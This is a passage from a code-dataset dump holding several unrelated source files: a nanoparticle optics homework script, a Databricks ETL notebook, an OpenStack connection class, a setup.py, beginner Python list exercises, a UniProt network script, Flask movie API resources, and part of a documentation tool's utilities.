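idx = np.abs(eps_r.real + 2 * eps_m).argmin()     # closest to Re{eps} = -2*eps_m
print(f"resonance near {lam[idx]*1e9:.1f} nm, Re(eps) = {eps_r.real[idx]:.2f}")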
Peak height here is \", sigma_ext[resonant_index]*1e18, \" nm^2.\")\n\n#Calculate the Q factor, as the resonant wavelength divided by the FWHM\nhalf_max = sigma_ext[resonant_index]/2\nleft_half_max_index = np.abs(sigma_ext[:resonant_index]-half_max).argmin()\nright_half_max_index = np.abs(sigma_ext[resonant_index:]-half_max).argmin() + resonant_index-1\nFWHM = wavelength[right_half_max_index]-wavelength[left_half_max_index]\nQ = wavelength[resonant_index]/FWHM\nprint(\"Q = \", Q, \" with FWHM = \", FWHM*1e9, \" nm.\")\n\n#Plot the scattering cross section\nax1 = plt.subplot(311)\nplt.plot(wavelength*1e9, sigma_sca*1e18)\nplt.suptitle(\"Scattering, absorption, and extinction cross-sections for $10nm$ Au NP\", fontsize=18)\nplt.ylabel(\"Scattering cross-section, $nm^{2}$\", fontsize=12)\nax1.set_xlim(xmin=495, xmax=805)\nax1.set_ylim(ymin=0, ymax=63)\nplt.grid(True)\n\n#Plot the absorption cross section\nax2 = plt.subplot(312)\nplt.plot(wavelength*1e9, sigma_abs*1e18)\nplt.ylabel(\"Absorption cross-section, $nm^{2}$\", fontsize=12)\nax2.set_xlim(xmin=495, xmax=805)\nax2.set_ylim(ymin=0, ymax=63)\nplt.grid(True)\n\n#Plot the extinction cross section\nax3 = plt.subplot(313)\nplt.plot(wavelength*1e9, sigma_ext*1e18)\nplt.ylabel(\"Extinction cross-section, $nm^{2}$\",fontsize=12)\nax3.set_xlim(xmin=495, xmax=805)\nax3.set_ylim(ymin=0, ymax=63)\nplt.xlabel(\"Wavelength, $nm$\", fontsize=14)\nplt.grid(True)\nplt.arrow(wavelength[left_half_max_index]*1e9+5,half_max*1e18,FWHM*1e9-5,0, length_includes_head=True, shape='full', head_width=2.5, width=0.1)\nplt.arrow(wavelength[right_half_max_index]*1e9-5,half_max*1e18,-FWHM*1e9+5,0, length_includes_head=True, shape='full', head_width=2.5, width=0.1)\nplt.annotate(s=\"$\\delta\\lambda$\", xy=[wavelength[resonant_index]*1e9-3, 22])\n\nfig = plt.gcf()\nfig.set_size_inches(9,9)\nplt.savefig('prob1_partb.png', dpi=200)\n\n#%% Problem 2\n#Plot the scattering and absorption cross-sections from 300-1000nm on a semilog plot\n\nplt.clf()\nplt.cla()\nplt.close()\n\n#Tell me where the minimum is in the scattering cross-section\nindex_minimum = sigma_sca.argmin()\nwavelength_min = wavelength[index_minimum]*1e9\nprint(\"Hey! Minimum in scattering occurs at \", wavelength_min, \" nm.\")\n\n#Plot the scattering cross section\nax1 = plt.subplot(211)\nplt.semilogy(wavelength*1e9, sigma_sca*1e18)\nplt.suptitle(\"Scattering and absorption cross-sections for $10nm$ Au NP\", fontsize=18)\nplt.ylabel(\"Scattering cross-section, $nm^{2}$\", fontsize=12)\nax1.set_xlim(xmin=95, xmax=1005)\nax1.set_ylim(ymin=1e-7, ymax=1e2)\nplt.grid(True)\n\n#Plot the absorption cross section\nax2 = plt.subplot(212)\nplt.semilogy(wavelength*1e9, sigma_abs*1e18)\nplt.ylabel(\"Absorption cross-section, $nm^{2}$\", fontsize=12)\nax2.set_xlim(xmin=95, xmax=1005)\nax2.set_ylim(ymin=1e-7, ymax=1e2)\nplt.grid(True)\nplt.xlabel(\"Wavelength, $nm$\", fontsize=14)\n\nfig = plt.gcf()\nfig.set_size_inches(7,7)\nplt.savefig('prob2.png', dpi=200)\n\n#%%Problem 4\n#Plot the scattering and absorption cross-sections as a function of R^3 at the resonant wavelength\n\nplt.clf()\nplt.cla()\nplt.close()\n\n#Create an array for the cubed radius\nR_cubed = np.linspace(1e-9**3, 10e-9**3, 1001)\n\n#Grab the relative dielectric constants at the resonant wavelength\ner_re_res = er_re[resonant_index]\ner_im_res = er_im[resonant_index]\nwavelength = resonant_wavelength\n\n#Calculate the scattering cross-section using eqn. 
(17)\nsigma_sca = (8*pi/3)*((2*pi/wavelength)**4)*(R_cubed**2)*(((er_re_res-e_water)**2+er_im_res**2)/((er_re_res+2*e_water)**2+er_im_res**2))**2\n\n#Calculate the absorption cross-section using eqn. (19)\nsigma_abs = (4*pi*2*pi/wavelength*R_cubed**1)*((er_im_res*e_water)/((er_re_res+2*e_water)**2+er_im_res**2))\n\n#Where are the effective cross-sections equal?\neq_index = np.abs(sigma_sca-sigma_abs).argmin()\nr_cubed_eq = R_cubed[eq_index]\nprint(\"The scattering and absorption cross sections are equal when the particle diameter is \", r_cubed_eq**(1/3)*2e9, \"nm.\")\nprint(r_cubed_eq)\n\n#Plot the scattering cross section\nax1 = plt.subplot(111)\nplt.plot(R_cubed*1e27, sigma_sca*1e18, label = \"Scattering\")\nplt.plot(R_cubed*1e27, sigma_abs*1e18, label = \"Absorption\", linestyle='--')\nplt.plot([5**3, 5**3], [0, 500], linestyle = ':', color ='black', linewidth=1.5)\nplt.plot([r_cubed_eq*1e27, r_cubed_eq*1e27], [0, 500], linestyle = ':', color ='black', linewidth=1.5)\nplt.annotate(s=\"$d=10nm$\", xy=[5**3+15, 153])\nplt.annotate(s=\"$d=18nm$\", xy=[r_cubed_eq*1e27+12, 153])\nplt.suptitle(\"Scattering and absorption cross-sections for $10nm$ Au NP\", fontsize=12)\nplt.ylabel(\"Effective cross-section, $nm^{2}$\", fontsize=12)\nplt.xlabel(\"$R^{3}, nm^{3}$\", fontsize=12)\nax1.set_xlim(xmin=0, xmax=1000)\nplt.legend(fontsize = 10, loc = 'upper left') \nax1.set_ylim(ymin=0, ymax=400)\nplt.grid(True)\n\nfig = plt.gcf()\nfig.set_size_inches(5,5)\nplt.savefig('prob4.png', dpi=200)","sub_path":"HW7/problem_1.py","file_name":"problem_1.py","file_ext":"py","file_size_in_byte":7661,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"86376850","text":"# Databricks notebook source\n# MAGIC %md\n# MAGIC COPYRIGHT: Columbia Sportswear 2018
\n# MAGIC DESCRIPTION: Get PDM Material Family info, and create the Enterpise MaterialFamily Dimension table. In the ADW Material Family is the PK, while in PDM the Design Number is still the PK with a few footwear designs without a family. DesignNumber to MaterialFamily is a one to one. We will keep the Design Number as PK until PDM made all their changes. \n# MAGIC \n# MAGIC -----------------------------------------------------------------\n# MAGIC ###### MODIFICATION LOG\n# MAGIC | Programmmer | Change Request | Date | Change Description |\n# MAGIC |----------------------|-----------------|------------|--------------------------------------------------------------------|\n# MAGIC | Adrina Meiring | Product Star Schema | 03/23/2020 | Initial Deployment |\n# MAGIC | | | | \n\n# COMMAND ----------\n\ndbutils.widgets.text(\"schmNm\", \"\", \"\")\ndbutils.widgets.text(\"tblNm\", \"\", \"\")\n\ndbutils.widgets.text(\"deltaTS\", \"\", \"\")\ndbutils.widgets.text(\"initFlg\", \"\", \"\")\n\n\ndbutils.widgets.get(\"deltaTS\")\ndeltaTS = getArgument(\"deltaTS\")\n\ndbutils.widgets.get(\"initFlg\")\ninitFlg = getArgument(\"initFlg\")\n\ndbutils.widgets.get(\"schmNm\")\nschmNm = getArgument(\"schmNm\")\n\ndbutils.widgets.get(\"tblNm\")\ntblNm = getArgument(\"tblNm\")\n\n#Update the Timestamp to remove T\ndeltaTS = deltaTS.replace('T',' ')\n\n\n# COMMAND ----------\n\n# MAGIC %sql\n# MAGIC CREATE DATABASE IF NOT EXISTS CSC\n# MAGIC location '/mnt/entadls/published/eim/managed/csc';\n# MAGIC CREATE TABLE if not exists CSC.DimMaterialFamily\n# MAGIC ( DesignNumber string\n# MAGIC , MaterialFamily string\n# MAGIC , EDW_CRT_TS timestamp\n# MAGIC , EDW_UPDT_TS timestamp\n# MAGIC , EDW_ACTV_FLG string \n# MAGIC , EDW_HASH_CHK string\n# MAGIC ) USING delta\n# MAGIC LOCATION '/mnt/entadls/published/eim/managed/csc/dimmaterialfamily' \n\n# COMMAND ----------\n\nif initFlg == \"X\" :\n\n truncateTable = \"TRUNCATE TABLE {0}.{1}\".format(schmNm, tblNm)\n print(truncateTable)\n spark.sql(truncateTable)\n\n# COMMAND ----------\n\n# Temp Source Delta view from all brands, for records since last run\nsqlQuery = \"\"\"CREATE OR REPLACE TEMPORARY VIEW delta_family AS \nSELECT DSGN_NM as DesignNumber\n , MTRL_FAM_NBR as MaterialFamily\n , EDW_UPDT_TS as EDW_CRT_TS\n , EDW_UPDT_TS\n , 'Y' as EDW_ACTV_FLG\n , cast('' as string) as EDW_HASH_CHK\nFROM (select DSGN_NM, MTRL_FAM_NBR, max(EDW_UPDT_TS) as EDW_UPDT_TS \n from ENTPR_PRODUCT.PDM_DSGN_SEAS\n group by DSGN_NM, MTRL_FAM_NBR\n ) as x\nWHERE x.EDW_UPDT_TS >= '{0}'\"\"\".format(deltaTS)\nspark.sql(sqlQuery) \n\n# COMMAND ----------\n\ndf = sqlContext.sql(\"SELECT DesignNumber, MaterialFamily, EDW_CRT_TS, EDW_UPDT_TS, EDW_ACTV_FLG, MD5(CONCAT(coalesce(cast(DesignNumber as string),''),coalesce(cast(MaterialFamily as String),''))) as EDW_HASH_CHK FROM delta_family\")\n\n# COMMAND ----------\n\ndf.createOrReplaceTempView(\"hash_family\")\n\n# COMMAND ----------\n\n# MAGIC %sql\n# MAGIC -- Create Global temp view in global_temp database for delta changes \n# MAGIC CREATE OR REPLACE GLOBAL TEMP VIEW dimmaterialfamily\n# MAGIC AS\n# MAGIC SELECT DesignNumber, MaterialFamily\n# MAGIC , EDW_CRT_TS, EDW_UPDT_TS, EDW_ACTV_FLG, EDW_HASH_CHK \n# MAGIC from hash_family\n# MAGIC ;\n\n# COMMAND ----------\n\n# Call reusable notebook to write to Azure data warehouse LND area \n# schemaNm = ADW landing schema \n# tableNm = ADW table name \n# dbrxTable = global temp table name\ndbutils.notebook.run(\"/Users/svceimdbrx@columbia.com/edw_admin/adw_integration_write\", 3600, {\"schemaNm\": 
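# The SELECT above computes EDW_HASH_CHK as MD5(CONCAT(coalesce(col, ''), ...))
# so the MERGE that follows can detect changed rows. The same idea in plain
# Python, which is handy for unit-testing the hash logic off-cluster; the sample
# design/family values are illustrative only:
import hashlib

def row_hash(*cols):
    """MD5 over the concatenation of columns, with None coalesced to ''."""
    joined = "".join("" if c is None else str(c) for c in cols)
    return hashlib.md5(joined.encode("utf-8")).hexdigest()

old = row_hash("D12345", "FAM-01")
new = row_hash("D12345", "FAM-02")
print(old != new)   # -> True: a MaterialFamily change would trigger an update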
\"CSC_LND\", \"tableNm\": \"DimMaterialFamily\", \"dbrxTable\": \"dimmaterialfamily\", \"writeMode\": \"overwrite\"})\n\n\n# COMMAND ----------\n\n# MAGIC %sql\n# MAGIC MERGE INTO CSC.DimMaterialFamily a\n# MAGIC USING global_temp.dimmaterialfamily b\n# MAGIC ON a.DesignNumber = b.DesignNumber\n# MAGIC \n# MAGIC WHEN MATCHED THEN UPDATE \n# MAGIC SET a.MaterialFamily = b.MaterialFamily\n# MAGIC , a.EDW_UPDT_TS = current_timestamp\n# MAGIC , a.EDW_ACTV_FLG = b.EDW_ACTV_FLG\n# MAGIC , a.EDW_HASH_CHK = b.EDW_HASH_CHK\n# MAGIC \n# MAGIC WHEN NOT MATCHED THEN INSERT\n# MAGIC ( DesignNumber\n# MAGIC , MaterialFamily\n# MAGIC , EDW_CRT_TS\n# MAGIC , EDW_UPDT_TS\n# MAGIC , EDW_ACTV_FLG\n# MAGIC , EDW_HASH_CHK\n# MAGIC )\n# MAGIC VALUES\n# MAGIC ( b.DesignNumber\n# MAGIC , b.MaterialFamily\n# MAGIC , current_timestamp\n# MAGIC , current_timestamp\n# MAGIC , b.EDW_ACTV_FLG\n# MAGIC , b.EDW_HASH_CHK);\n\n# COMMAND ----------\n\n# MAGIC %sql\n# MAGIC --Drop the global temp view once the data has been sent to ADW.\n# MAGIC DROP VIEW IF EXISTS global_temp.dimmaterialfamily;\n","sub_path":"Dev/csc/dimmaterialfamily.py","file_name":"dimmaterialfamily.py","file_ext":"py","file_size_in_byte":4789,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"592536769","text":"# Copyright (c) 2016 OpenStack Foundation.\n# All Rights Reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\"); you may\n# not use this file except in compliance with the License. You may obtain\n# a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT\n# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. 
See the\n# License for the specific language governing permissions and limitations\n# under the License.\n\nimport os\n\nfrom ovs.db import idl\n\nfrom ovsdbapp.backend.ovs_idl import connection as conn\n\n\ndef get_schema_helper_for_vtep():\n current_dir = os.path.dirname(os.path.realpath(__file__))\n return idl.SchemaHelper(current_dir + '/../vtep/vtep.ovsschema')\n\n\nclass Connection(conn.Connection):\n def __init__(self, connection, timeout, schema_name):\n idl_ = idl.Idl(connection, get_schema_helper_for_vtep())\n super(Connection, self).__init__(idl_, timeout)\n","sub_path":"networking_l2gw/services/l2gateway/agent/ovsdb/native/connection.py","file_name":"connection.py","file_ext":"py","file_size_in_byte":1115,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"31717157","text":"\n\nimport logging\nfrom setuptools import setup\nfrom distutils.extension import Extension\nfrom Cython.Build import cythonize\nimport numpy\n\n\nextensions = [\n Extension(\"NPTFit.npll\", [\"NPTFit/npll.pyx\"],\n include_dirs=[numpy.get_include()], extra_compile_args=[\"-ffast-math\",'-O3']),\n Extension(\"NPTFit.pll\", [\"NPTFit/pll.pyx\"],\n include_dirs=[numpy.get_include()], extra_compile_args=[\"-ffast-math\",'-O3']),\n Extension(\"NPTFit.incgamma_fct_p\", [\"NPTFit/incgamma_fct_p.pyx\"],\n include_dirs=[numpy.get_include()], extra_compile_args=[\"-ffast-math\",'-O3']),\n Extension(\"NPTFit.x_m\", [\"NPTFit/x_m.pyx\"],\n include_dirs=[numpy.get_include()], extra_compile_args=[\"-ffast-math\",'-O3']),\n Extension(\"NPTFit.incgamma_fct\", [\"NPTFit/incgamma_fct.pyx\"],\n include_dirs=[numpy.get_include()], libraries=[\"gsl\", \"gslcblas\", \"m\"],\n extra_compile_args=[\"-ffast-math\",'-O3'])\n]\n\nsetup_args = {'name':'NPTFit',\n 'version':'0.2',\n 'description':'A Python package for Non-Poissonian Template Fitting',\n 'url':'https://github.com/bsafdi/NPTFit',\n 'author':'Siddharth Mishra-Sharma',\n 'author_email':'smsharma@princeton.edu',\n 'license':'MIT',\n 'install_requires':[\n 'numpy',\n 'matplotlib',\n 'healpy',\n 'Cython',\n 'pymultinest',\n 'jupyter',\n 'corner',\n 'mpmath',\n ]}\n \n# Attempt GSL compilation; if this fails, do standard compilation.\n\ntry:\n print(\"Attempting GSL compilation...\")\n setup(packages=['NPTFit'],\n ext_modules = cythonize(extensions),\n **setup_args\n )\n print(\"GSL compilation successful!\")\n\nexcept:\n print(\"GSL compilation failed! Attempting mpmath compilation...\")\n setup(packages=['NPTFit'],\n ext_modules = cythonize(extensions[:-1]),\n **setup_args\n )\n print(\"mpmath compilation successful!\")\n","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1915,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"457891100","text":"import sys\n\n# 1. 
Write a Python program to sum all the items in a list.\ndef sumList():\n list = [1,2,3,4,5]\n print(list)\n x = 0\n for n in list:\n x += n\n print(\"Sum of list: \" + str(x))\n xy = sum(list)\n print(\"Or use sum(list) : \" + str(xy))\n\n# 2.Write a Python program that multiplies all the items in a list.\ndef mulitpyList():\n list = [1,2,3,4,5]\n print(\"List: \" + str(list))\n x = 1\n for n in list:\n x *= n\n print(\"Product of list: {}\".format(x))\n\n# 3.Write a Python program to get the largest number from a list.\ndef maxInList():\n list = [1,7,3,4,5]\n print(\"List: \" + str(list))\n largest = 0\n for n in list:\n if n > largest:\n largest = n\n print(\"Largest element in list is: {}\".format(largest))\n # or use max() function\n print(\"Using max() function: {}\".format(max(list)))\n\n# 4. Write a Python program to get the smallest number from a list.\ndef minInList():\n list = [16,7,3,4,5]\n print(\"List: \" + str(list))\n smallest = sys.maxsize\n for n in list:\n if n < smallest:\n smallest = n\n print(\"Min element of list is: {}\".format(smallest))\n # or use min() function\n print(\"Using min function(): {}\".format(min(list)))\n\n# 5. Write a Python program to count the number of strings where the string length is 2 or\n# more and the first and last character are same from a given list of strings\n\"\"\"\nSample List : ['abc', 'xyz', 'aba', '1221']\nExpected Result : 2\n\"\"\"\ndef countStrings():\n list = ['abc', 'xyz', 'aba', '1221']\n list2 = [0] * len(list)\n counter = 0\n for n in list:\n if len(n) > 2:\n if n[0] == n[-1]:\n list2[counter] = n\n counter += 1\n x = 4 - counter\n for n in range(x):\n list2.pop()\n print(\"Strings: {}\".format(list2))\n print(\"Result: \" + str(counter))\n\n# 6. Write a Python program to get a list, sorted in increasing order by the last element in each tuple from a\n# given list of non-empty tuples.\n\"\"\"\nSample List : [(2, 5), (1, 2), (4, 4), (2, 3), (2, 1)]\nExpected Result : [(2, 1), (1, 2), (2, 3), (4, 4), (2, 5)]\n\"\"\"\ndef getLast(tuple):\n return tuple[-1]\n\ndef sortByLastTuple():\n sample = [(2, 5), (1, 2), (4, 4), (2, 3), (2, 1)]\n sortedSample = sorted(sample, key=getLast)\n print(sortedSample)\n\n# 7. Write a Python program to remove duplicates from a list.\ndef removeDuplicates():\n sample = [1,13,2,15,1,16,7,7]\n print(\"Sample list: \" + str(sample))\n x = set(sample)\n print(\"Set made of sample list: \" + str(x))\n for n in x:\n if sample.count(n) > 1:\n for m in range(2):\n sample.remove(n)\n print(\"List after removing duplicates: \" + str(sample))\n\n# 8. Write a Python program to check a list is empty or not.\ndef checkEmpty():\n list = []\n list2 = [1,2]\n checkList = list2\n if len(checkList) != 0:\n print(\"List is not empty!\")\n else:\n print(\"List is empty\")\n\n# 9. Write a Python program to clone or copy a list.\ndef cloneList():\n sample = [1,13,2,15,1,16,7,7]\n new_list = []\n for n in sample:\n new_list.append(n)\n print(\"For loop: {}\".format(new_list))\n #or\n list_clone =sample.copy()\n print(\".copy() : {}\".format(list_clone))\n\n# 10. Write a Python program to find the list of words that are longer than n from a given list of words.\n\n# 11.Write a Python function that takes two lists and returns True if they have at least one common member.\ndef commonMember():\n sample1 = [1,2,3,4,5]\n sample2 = [1,12,13,1,5]\n counter = 0\n for n in sample1:\n for m in sample2:\n if n == m:\n print(\"m: {0}, n:{1}\".format(m,n))\n print(\"True\")\n\n# 12. 
Write a Python program to print a specified list after removing the 0th, 4th and 5th elements.\n\"\"\"\nSample List : ['Red', 'Green', 'White', 'Black', 'Pink', 'Yellow']\nExpected Output : ['Green', 'White', 'Black']\n\"\"\"\ndef remove045():\n sample = ['Red', 'Green', 'White', 'Black', 'Pink', 'Yellow']\n print(\"List: {}\".format(sample))\n sample.pop(0)\n sample.pop(3)\n sample.pop(3)\n print(\"List after removing elements: {}\".format(sample))\n\n","sub_path":"list.py","file_name":"list.py","file_ext":"py","file_size_in_byte":4184,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"454781582","text":"#%%\nimport numpy as np\nimport pandas as pd\n\n# Load the complete gene-linked dataset\ndata = pd.read_csv('../../data/uniprot_biological_processes.csv')\n\n# %%\n# Instantiate an empty list to keep track of what classes have already been\n# linked\nconnected_pairs = []\n\n# Instantiate an empty dataframe of connections\ndf = pd.DataFrame([], columns=['process_1', 'process_2', 'n_genes'])\n\nfor i, process_i in enumerate(data['process'].unique()):\n for j, process_j in enumerate(data['process'].unique()):\n # If the process is the same, move on\n if process_i == process_j:\n continue\n\n # Find the number of common genes\n n_genes = len(set(data[data['process']==process_i]['gene'].values).intersection(\n data[data['process']==process_j]['gene'].values))\n\n # update the dataframe (keep connections of 0)\n df = df.append({'process_1':process_i, \n 'process_2':process_j,\n 'n_genes':n_genes}, ignore_index=True)\n\n# %%\n# Save the data to disk.\ndf.to_csv('../../data/uniprot_process_gene_network.csv', index=False)\n\n\n# %%\n","sub_path":"code/processing/schmidt_2016_munging/uniprot_process_network_generation.py","file_name":"uniprot_process_network_generation.py","file_ext":"py","file_size_in_byte":1121,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"413407107","text":"#-*- coding:utf-8 -*-\n\nfrom flask.ext.restful import (Resource, reqparse, abort, fields, marshal_with,\n marshal)\nfrom sqlalchemy.orm.exc import NoResultFound\n\nfrom app.movies.models import Movie, Genre, Person\n\n\nparser = reqparse.RequestParser()\nparser.add_argument('limit', type=int)\nparser.add_argument('offset', type=int)\n\n\nclass BaseResource(Resource):\n model = None\n fields = None\n path = ''\n endpoint = ''\n\n def build_query(self):\n if self.model:\n return self.model.query\n else:\n raise ValueError('None is invalid model')\n\n\nclass BaseItemResource(BaseResource):\n def get(self, item_id):\n try:\n instance = self.build_query().filter_by(id=item_id).one()\n except NoResultFound:\n abort(404, message=\"Movie {} doesn't exist\".format(item_id))\n else:\n return marshal(instance, fields=self.fields), 200\n\n\nclass BaseCollectionResource(BaseResource):\n pass\n\n\nclass GenreMixin(object):\n model = Genre\n fields = {\n 'id': fields.Integer,\n 'title': fields.String,\n 'title_rus': fields.String,\n 'slug': fields.String\n }\n\n\nclass PersonMixin(object):\n model = Person\n fields = {\n 'name': fields.String,\n 'slug': fields.String,\n 'imdb_id': fields.String,\n 'kp_id': fields.String,\n 'poster': fields.String,\n 'person_type': fields.String\n }\n\n\nclass MovieMixin(object):\n model = Movie\n fields = {\n 'id': fields.Integer,\n 'title': fields.String,\n 'title_rus': fields.String,\n 'slug': fields.String,\n 'imdb_id': fields.String,\n # 'kp_id': fields.String,\n 'imdb_rating': 
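# Exercise 7 above pops exactly two occurrences of every repeated value, so a
# value that appears exactly twice vanishes entirely and higher multiplicities
# are mishandled. An order-preserving de-duplication that works for any
# multiplicity (dicts preserve insertion order on Python 3.7+):
sample = [1, 13, 2, 15, 1, 16, 7, 7, 7]

deduped = list(dict.fromkeys(sample))
print(deduped)   # -> [1, 13, 2, 15, 16, 7]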
fields.Float,\n # 'kp_rating': fields.Float,\n 'year': fields.String,\n # 'is_series': fields.Boolean,\n 'poster': fields.String,\n 'world_premiere_date': fields.DateTime,\n 'rus_premiere_date': fields.DateTime,\n 'dvd_premiere_date': fields.DateTime,\n 'genres_list': fields.List(fields.Integer),\n 'related_list': fields.List(fields.Integer)\n }\n\n\nclass GenreListResource(GenreMixin, BaseResource):\n path = '/genres'\n endpoint = 'genres_resource'\n\n @marshal_with(GenreMixin.fields)\n def get(self):\n args = parser.parse_args()\n query = self.build_query()\n if args['limit'] and args['offset']:\n query = query.limit(args['limit']).offset(args['offset'])\n return query.all()\n\n\nclass GenreItemResource(GenreMixin, BaseItemResource):\n path = '/genres/'\n endpoint = 'genre_resource'\n\n\nclass MovieListResource(MovieMixin, BaseResource):\n path = '/movies'\n endpoint = 'movies_resource'\n\n def get(self):\n args = parser.parse_args()\n\n params = [\n Movie.is_series == False\n ]\n\n query = self.build_query()\n query = query.filter(*params).order_by(Movie.imdb_rating.desc())\n if args['limit']:\n query = query.limit(args['limit'])\n if args['offset']:\n query = query.offset(args['offset'])\n movies = query.all()\n Movie.load_genres(movies)\n Movie.load_related(movies)\n return marshal(movies, self.fields)\n\n\nclass MovieItemResource(MovieMixin, BaseItemResource):\n path = '/movies/'\n endpoint = 'movie_resource'\n\n\nresources = (\n GenreListResource, GenreItemResource,\n MovieListResource, MovieItemResource\n)\n","sub_path":"app/movies/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3495,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"419045592","text":"#!/usr/bin/env python3\n# This file is a part of marzer/poxy and is subject to the the terms of the MIT license.\n# Copyright (c) Mark Gillard \n# See https://github.com/marzer/poxy/blob/master/LICENSE for the full license text.\n# SPDX-License-Identifier: MIT\n\nimport sys\nimport re\nimport io\nimport logging\nfrom pathlib import Path\nfrom io import StringIO\nfrom misk import *\n\n\n#=======================================================================================================================\n# FUNCTIONS\n#=======================================================================================================================\n\ndef coerce_path(arg, *args):\n\tassert arg is not None\n\tif args is not None and len(args):\n\t\treturn Path(str(arg), *[str(a) for a in args])\n\telse:\n\t\tif not isinstance(arg, Path):\n\t\t\targ = Path(str(arg))\n\t\treturn arg\n\n\n\ndef coerce_collection(val):\n\tassert val is not None\n\tif not is_collection(val):\n\t\tval = ( val, )\n\treturn val\n\n\n\ndef regex_or(patterns, pattern_prefix = '', pattern_suffix = '', flags=0):\n\tpatterns = [str(r) for r in patterns if r is not None and r]\n\tpatterns.sort()\n\tpattern = ''\n\tif patterns:\n\t\tpattern = '(?:(?:' + ')|(?:'.join(patterns) + '))'\n\tpatterns = re.compile(pattern_prefix + pattern + pattern_suffix, flags=flags)\n\treturn patterns\n\n\n\ndef log(logger, msg, level=logging.INFO):\n\tif logger is None or msg is None:\n\t\treturn\n\tif isinstance(logger, bool):\n\t\tif logger:\n\t\t\tprint(msg, file=sys.stderr if level >= logging.WARNING else sys.stdout)\n\telif isinstance(logger, logging.Logger):\n\t\tlogger.log(level, msg)\n\telif isinstance(logger, io.IOBase):\n\t\tprint(msg, file=logger)\n\telse:\n\t\tlogger(msg)\n\n\n\ndef enum_subdirs(root, 
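# The resource mixins above pair a SQLAlchemy model with a flask-restful fields
# dict and serialize via marshal(). The fields/marshal step also works on plain
# dicts, which makes the mapping easy to try in isolation (assumes flask-restful
# is installed; the movie values are illustrative only):
from flask_restful import fields, marshal

movie_fields = {
    "id": fields.Integer,
    "title": fields.String,
    "imdb_rating": fields.Float,
}

raw = {"id": 7, "title": "Stalker", "imdb_rating": 8.1, "kp_id": "ignored"}
print(marshal(raw, movie_fields))   # keys outside movie_fields are dropped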
filter=None, recursive=False):\n\troot = coerce_path(root)\n\tassert root.is_dir()\n\tsubdirs = []\n\tfor p in root.iterdir():\n\t\tif p.is_dir():\n\t\t\tif filter is not None and not filter(p):\n\t\t\t\tcontinue\n\t\t\tsubdirs.append(p)\n\t\t\tif recursive:\n\t\t\t\tsubdirs = subdirs + enum_subdirs(p, filter=filter, recursive=True)\n\treturn subdirs\n\n\n\ndef combine_dicts(x, y):\n\tz = x.copy()\n\tz.update(y)\n\treturn z\n\n\n\n_is_uri_regex = re.compile(r'^[a-zA-Z][a-zA-Z0-9_]*://.+$')\ndef is_uri(s):\n\tglobal _is_uri_regex\n\treturn _is_uri_regex.fullmatch(str(s)) is not None\n\n\n\n_lib_version = None\ndef lib_version():\n\tglobal _lib_version\n\tif _lib_version is None:\n\t\tdata_dir = Path(Path(__file__).resolve().parent, r'data')\n\t\twith open(Path(data_dir, 'version.txt'), encoding='utf-8') as file:\n\t\t\t_lib_version = [v.strip() for v in file.read().strip().split('.')]\n\t\t\t_lib_version = [v for v in _lib_version if v]\n\t\t\tassert len(_lib_version) == 3\n\t\t\t_lib_version = tuple(_lib_version)\n\treturn _lib_version\n\n\n\n#=======================================================================================================================\n# REGEX REPLACER\n#=======================================================================================================================\n\nclass RegexReplacer(object):\n\n\tdef __substitute(self, m):\n\t\tself.__result = True\n\t\treturn self.__handler(m, self.__out_data)\n\n\tdef __init__(self, regex, handler, value):\n\t\tself.__handler = handler\n\t\tself.__result = False\n\t\tself.__out_data = []\n\t\tself.__value = regex.sub(lambda m: self.__substitute(m), value)\n\n\tdef __str__(self):\n\t\treturn self.__value\n\n\tdef __bool__(self):\n\t\treturn self.__result\n\n\tdef __len__(self):\n\t\treturn len(self.__out_data)\n\n\tdef __getitem__(self, index):\n\t\treturn self.__out_data[index]\n\n\n\n#=======================================================================================================================\n# CppTree\n#=======================================================================================================================\n\nclass CppTree(object):\n\n\tNAMESPACES = 1\n\tTYPES = 2\n\tENUM_VALUES = 4\n\n\tclass Node(object):\n\n\t\tdef __init__(self, val, parent, type_ = 0):\n\t\t\tassert val.find(r'::') == -1\n\t\t\tassert type_ in (0, CppTree.NAMESPACES, CppTree.TYPES, CppTree.ENUM_VALUES)\n\t\t\tself.value = val\n\t\t\tself.parent = parent\n\t\t\tself.type = type_\n\t\t\tself.mask = type_\n\t\t\tself.children = {}\n\n\t\tdef add(self, val, type_ = 0):\n\t\t\tassert val.find(r'::') == -1\n\t\t\tassert type_ in (0, CppTree.NAMESPACES, CppTree.TYPES, CppTree.ENUM_VALUES)\n\t\t\tchild = None\n\t\t\tif val not in self.children:\n\t\t\t\tchild = CppTree.Node(val, self, type_)\n\t\t\t\tself.children[val] = child\n\t\t\telse:\n\t\t\t\tchild = self.children[val]\n\t\t\t\tif type_:\n\t\t\t\t\tassert child.type in (0, type_)\n\t\t\t\t\tchild.type = type_\n\t\t\t\t\tchild.mask = child.mask | type_\n\t\t\tself.mask = self.mask | child.mask\n\t\t\treturn child\n\n\t\tdef regex_matcher(self, type_):\n\t\t\tassert type_ in (CppTree.NAMESPACES, CppTree.TYPES, CppTree.ENUM_VALUES)\n\t\t\tif not (type_ & self.mask):\n\t\t\t\treturn None\n\t\t\tif not self.children:\n\t\t\t\treturn self.value\n\t\t\tmatchers = [v.regex_matcher(type_) for k, v in self.children.items()]\n\t\t\tmatchers = [v for v in matchers if v is not None]\n\t\t\tif not matchers:\n\t\t\t\tif self.type == type_:\n\t\t\t\t\treturn self.value\n\t\t\t\treturn 
